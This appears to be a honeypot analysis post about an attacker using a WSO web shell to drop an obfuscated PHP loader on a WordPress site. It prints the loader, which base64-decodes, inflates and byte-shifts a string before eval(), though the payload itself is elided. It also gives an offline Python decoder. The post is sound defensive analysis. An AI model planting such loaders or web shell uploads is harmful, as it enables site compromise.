A fairly basic decoder.
195.154.220.30 has DNS name 30.220.154.rdns.systems
rdns.systems has this whois info:
Domain Name: rdns.systems
Tech Organization: Technology LLC
Tech Street: c/o IDPS International Domain Privacy Services GmbH Hansaallee 191
Tech City: Duesseldorf
Tech State/Province:
Tech Postal Code: 40549
Tech Country: DE
195.154.220.30 has different whois info:
route: 195.154.0.0/16
descr: Online SAS
descr: Paris, France
origin: AS12876
mnt-by: MNT-TISCALIFR
created: 2013-08-02T09:05:22Z
last-modified: 2013-08-02T09:05:22Z
The attacker intended to use a WSO ("Web Shell by oRb") instance to download the code to my WordPress honey pot. The attacker wanted to use the "FilesMan" action of WSO, "uploadFile" sub-action.
This would leave a file behind.
<?php
// Decoder dropped by the upload: base64-decode, gzinflate, then shift every byte down by one.
function fUUPd($NVAR)
{
    $NVAR = gzinflate(base64_decode($NVAR));
    for ($i = 0; $i < strlen($NVAR); $i++) {
        $NVAR[$i] = chr(ord($NVAR[$i]) - 1);
    }
    return $NVAR;
}
// The decoded result is passed straight to eval(); the payload string is elided here.
eval(fUUPd("jbvnz.../9y//5f/x/"));
Base64-decodes the string, decompresses the result with gzinflate(), then shifts each byte down by one (numeric) value. So for ASCII text, 'G' (0x47 as a number) would become 'F' (0x46 as a number). That counts as a "Caesar Cipher".
Makes no attempt to hide the base64_decode() or eval() function calls, but the function name fUUPd does seem to be obfuscated.
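To recover the staged code without running it, the same three steps can be replayed offline. The following Python is an added example, not code from the post or from WSO; it re-implements fUUPd() (PHP's gzinflate() is a raw DEFLATE stream, wbits=-15 for zlib) and, since the real argument is elided above, builds a harmless constructed payload with the inverse transform so the decoder can be exercised.

```python
import base64
import zlib


def fuupd_decode(blob: str) -> bytes:
    """Mirror of fUUPd(): base64-decode, gzinflate, then subtract 1 from every byte."""
    # PHP gzinflate() expects raw DEFLATE data (no zlib or gzip header), i.e. wbits=-15.
    inflated = zlib.decompress(base64.b64decode(blob), -15)
    # PHP chr(ord($c) - 1) wraps: chr(-1) is 0xFF, so reduce modulo 256 here too.
    return bytes((b - 1) % 256 for b in inflated)


def fuupd_encode(plain: bytes) -> str:
    """Inverse transform (byte+1, raw DEFLATE, base64); used only to construct a sample."""
    shifted = bytes((b + 1) % 256 for b in plain)
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(shifted) + comp.flush()
    return base64.b64encode(deflated).decode("ascii")


# Constructed, harmless stand-in for the elided "jbvnz.../9y//5f/x/" argument.
SAMPLE_PLAIN = b"echo 'decoded stage would appear here';"
SAMPLE_PAYLOAD = fuupd_encode(SAMPLE_PLAIN)

if __name__ == "__main__":
    # Print the recovered source instead of eval()-ing it.
    print(fuupd_decode(SAMPLE_PAYLOAD).decode("ascii"))
```

Dropping the output to a file rather than executing it is the point: the recovered text is what the attacker wanted eval() to run.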